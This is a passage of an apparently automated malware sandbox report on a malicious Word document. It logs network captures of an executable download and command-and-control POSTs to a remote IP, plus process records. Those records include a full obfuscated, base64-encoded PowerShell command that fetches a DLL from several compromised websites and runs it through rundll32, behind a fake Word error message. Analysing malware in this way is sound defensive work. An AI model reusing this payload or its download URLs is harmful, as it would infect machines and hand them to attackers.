00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 57 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 14 ed 04 00 00 70 00 00 00 ee 04 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 60 05 00 00 02 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 70 05 00 00 02 00 00 00 32 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 a0 05 00 00 04 00 00 00 38 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 10000MZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`d<Xa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8d`0 @.text7dp2 @.text6d4 @.text5d6 @.reloc8@B
                                                        Jan 23, 2021 13:39:18.424966097 CET13INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: U]
                                                        Jan 23, 2021 13:39:18.424997091 CET14INData Raw: 8b ec 51 a1 cc 63 00 10 8b 48 fc 89 4d fc 8b 55 fc 89 15 8c 63 00 10 8b 45 fc 8b e5 5d c3 cc 55 8b ec 83 ec 0c a1 00 62 00 10 89 45 f4 c7 45 f8 b0 60 00 10 8b 4d f8 c6 01 9c 8b 55 f8 0f b6 02 83 e8 33 8b 4d f8 88 01 8b 55 f8 c6 42 01 a1 8b 45 f8
                                                        Data Ascii: QcHMUcE]UbEE`MU3MUBEH3UJE@MQ3EPMAUB3MAUBEH3UJE@MQ3EPMAUB3MAUBEH3UJE@M
                                                        Jan 23, 2021 13:39:18.425024033 CET16INData Raw: 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45
                                                        Data Ascii: EAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAMc-chx`h(db(dJu*dhu,dDu3!c
                                                        Jan 23, 2021 13:39:18.425060987 CET17INData Raw: 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a
                                                        Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                        Jan 23, 2021 13:39:18.425100088 CET19INData Raw: c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16
                                                        Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                        Jan 23, 2021 13:39:18.425132036 CET20INData Raw: 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00
                                                        Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                        Jan 23, 2021 13:39:18.425159931 CET21INData Raw: f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00
                                                        Data Ascii: *E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                        Jan 23, 2021 13:39:18.425193071 CET23INData Raw: 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7
                                                        Data Ascii: *E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                        Jan 23, 2021 13:39:18.425266981 CET24INData Raw: 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45
                                                        Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E
                                                        Jan 23, 2021 13:39:18.498704910 CET26INData Raw: 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00
                                                        Data Ascii: p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.2249173195.159.28.2308080C:\Windows\SysWOW64\rundll32.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 23, 2021 13:39:57.792049885 CET374OUTPOST /u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/ HTTP/1.1
                                                        DNT: 0
                                                        Referer: 195.159.28.230/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/
                                                        Content-Type: multipart/form-data; boundary=----------------------zKAKAug7sQGRsm0tnrHdM1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 195.159.28.230:8080
                                                        Content-Length: 5540
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Jan 23, 2021 13:39:58.087609053 CET381INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 23 Jan 2021 12:39:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Vary: Accept-Encoding
                                                        Data Raw: 35 32 34 0d 0a b7 a3 64 e4 a4 01 91 6f 82 f1 e8 e4 7a b2 3d f7 1a f7 9c 2f cc a1 7f 82 17 4c b8 a8 1b 43 4a 69 f3 31 23 c2 07 c3 90 3f a1 4e 90 e1 53 fe 00 62 ef 67 e9 fc 15 7a 6b b1 7a 08 4a f4 35 d1 73 b0 4d 30 af 10 88 4f 59 c2 04 00 8c 5f 44 3d 9d ef 04 27 78 92 23 db 90 2b a4 38 9f b4 c3 2d 1c 94 56 92 be 9d e1 0c 44 c8 24 60 5c b6 8d 4b c3 ae e6 f0 36 58 e7 9b 9f 04 fe 68 48 a0 f2 c7 29 d8 12 56 bb 73 b2 06 df d7 27 b7 95 07 63 c5 98 9b 79 bf 6b 1e 71 83 7f dc 77 37 5f 0d a8 a4 e1 d3 fb e8 e5 5c 8b 4d 5b e6 13 dd 55 28 2c 45 95 bc 8e 74 9f d7 39 e0 cc 49 f5 b3 f1 13 32 26 96 db ae 0f 73 e9 2a 02 02 a1 3b 35 38 f3 40 d6 1d 08 f9 92 ee 77 98 7e 02 5f 66 b7 2b aa 2f a1 9c 81 34 98 ab 82 90 0b 2e 4e b0 22 b5 5e a6 4e 45 5a 49 b9 ac 34 c8 1e 11 94 3e 44 19 6f 23 61 17 eb 99 1b ee 03 59 7f db 22 3d 61 3b dd 1a 36 25 c9 8c 71 61 cd 45 d0 df f7 ef 3e 89 71 ae 96 5d 36 e8 ad 33 ea 4f 7f b1 56 81 af fb e9 2e 26 9c f6 59 1a 14 6c 5b 41 2a d2 09 41 cf 64 5e 03 7f 65 e3 ac 5a df f2 70 62 1d fe 01 49 4f 3a 79 37 7d 84 19 da f3 cf fe be 0a 9e 68 d1 38 7f 17 68 96 7f ce 2d 55 7c 89 6e 0c df 29 4b c8 ec a0 18 a0 e1 aa e0 2c f7 c1 51 84 74 fa 3f 19 89 62 0c 57 12 6b 26 c6 6f b2 e9 9a 6d 25 69 98 a7 a6 43 15 c3 b4 97 f3 ec 19 f2 5b 3e 1c 3e ee 56 63 13 3f 3e c3 ee 79 af 1d ac 4b ef 83 2e a6 9e 97 18 c6 79 d1 29 bd 0e 11 9c 46 34 1b 3f ea d3 01 b8 19 d3 e4 48 42 ce 24 32 c8 57 e1 7d 67 fa cf a3 ce 1d 35 02 cd 1e c0 34 fd f4 c5 8a db c0 d3 07 a7 55 18 b8 f0 be 06 ff 15 8d 0f 29 42 97 c6 b3 0d 7a 15 78 d9 1a 0e fc 13 82 8c 46 90 4e 87 c0 68 1e b0 d6 66 28 3c 28 7d 50 35 de 94 65 2d 3e ef b3 ee 0b 75 be ff aa 2a 7f 80 a0 55 ad cb 98 7b 5f c0 d9 92 4e 3f d4 b0 b2 25 c0 eb 26 e0 42 a2 49 5b 16 10 75 b4 34 92 8d 65 05 c9 3b ec 6c a3 b9 dd 77 7b c9 b2 43 0a b4 85 6a 0f 76 8a 8d a9 ee 1a 7a 66 c0 6a 4e 07 55 e3 54 88 f0 21 1d b1 4e 1b 91 72 00 a4 a4 6d 9e bd 61 fa 88 3d 10 74 50 9b 0f 56 9f 40 3b ae 11 85 a5 8e 00 8b af 24 f8 36 99 a9 ae ff 91 9f d4 5b 68 54 90 c8 8d 8e 7b 8d 5c e3 8e d5 e6 54 76 88 89 4c 50 c1 7f 1c 70 83 5f 1c e7 c4 3a 48 ee 3b b9 c6 93 c6 1e 72 e8 0c fb ac 5e 8f 11 ff 38 67 e9 77 91 08 d1 a9 ce 62 23 e2 a0 55 29 7f 33 d1 73 de d2 ec 85 7b b1 60 08 e7 de 9f 15 67 49 05 c7 1e 9b b6 c4 8b 02 7c 29 3c 34 0c cc d7 15 6a 4d 2c 9f 9f c4 98 7c 7c 81 21 e9 94 3b 87 03 81 e0 d2 40 79 f9 23 05 e6 83 78 58 52 6a 49 33 13 ce 23 dc 67 2a dc 07 73 84 5b 2c 0c 67 ac 8c da a0 a2 65 7f 5b 74 2d 8e e6 ef e4 b3 1e 20 91 c7 58 ad f4 09 ff b7 92 51 66 ef 59 21 a7 bb b1 9b a3 99 19 ee 40 cf f7 a9 dc 77 20 40 bd 5c b6 3d de aa 9e f5 5c 70 8f 5b dd 97 04 50 81 69 af 88 81 3e 98 e6 06 83 07 78 54 cd a5 c5 04 8c f4 ef 69 62 55 4c 05 3c 55 66 f6 f7 c6 07 84 2a 1f 84 74 6d 76 8e f8 f2 1c e6 5b 48 2e f0 07 48 a4 40 03 14 7c 52 bf 2a 0b 6f 90 84 6d be 92 ce e3 aa fb 07 16 2f 78 67 35 0a ef 47 5c ee 3d 9b 6c 1b e5 06 49 53 5c d9 40 b6 0c df dc 1a 07 4b 92 76 77 a3 c1 3f 0b 38 d5 36 cb ad 05 d1 85 78 31 8a 75 7b 32 c5 eb 45 40 3f 06 58 15 bb 2a e2 17 25 b1 f6 47 f9 d7 09 4c 25 ab 65 3e fe ac 99 22 bd 41 6f 40 57 55 ce 8c 2a 8a d2 27 55 8d 73 bc 80 84 9f a2 2a be 8b 4d d8 a0 32 ee 7c 1c 50 23 3a 4a 0c 01 50 97 74 82 e7 28 9d 1d 5f 55 af 33 4d 55 c2 5f 8f 3f 75 0a 40 03 e7 0a cd 2c 57 76 ce c1 92 01 4e 2a 22 cc e7 42 12 fd 80 54 6f 00 06 55 96 ee c6 e2 28 c5 9a 73 03 3a 65 8c 3a 94 1d da 85 7f 7a de e7 0e aa 7d 03 b5 cd a9 2d 9c 0b 81 18 02 a2 b0 be f1 7f 43 ea fa 7c 2d db 22 ef 2c 4f 2b bd f1 82 c7 79 9a e3 e3 64 3d c9 a8 2c 18
                                                        Data Ascii: 524doz=/LCJi1#?NSbgzkzJ5sM0OY_D='x#+8-VD$`\K6XhH)Vs'cykqw7_\M[U(,Et9I2&s*;58@w~_f+/4.N"^NEZI4>Do#aY"=a;6%qaE>q]63OV.&Yl[A*Ad^eZpbIO:y7}h8h-U|n)K,Qt?bWk&om%iC[>>Vc?>yK.y)F4?HB$2W}g54U)BzxFNhf(<(}P5e->u*U{_N?%&BI[u4e;lw{CjvzfjNUT!Nrma=tPV@;$6[hT{\TvLPp_:H;r^8gwb#U)3s{`gI|)<4jM,||!;@y#xXRjI3#g*s[,ge[t- XQfY!@w @\=\p[Pi>xTibUL<Uf*tmv[H.H@|R*om/xg5G\=lIS\@Kvw?86x1u{2E@?X*%GL%e>"Ao@WU*'Us*M2|P#:JPt(_U3MU_?u@,WvN*"BToU(s:e:z}-C|-",O+yd=,


                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:13:38:34
                                                        Start date:23/01/2021
                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                        Imagebase:0x13f320000
                                                        File size:1424032 bytes
                                                        MD5 hash:95C38D04597050285A18F66039EDB456
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:13:38:35
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA=
                                                        Imagebase:0x4a630000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:38:36
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\System32\msg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:msg user /v Word experienced an error trying to open the file.
                                                        Imagebase:0xff190000
                                                        File size:26112 bytes
                                                        MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:38:36
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsA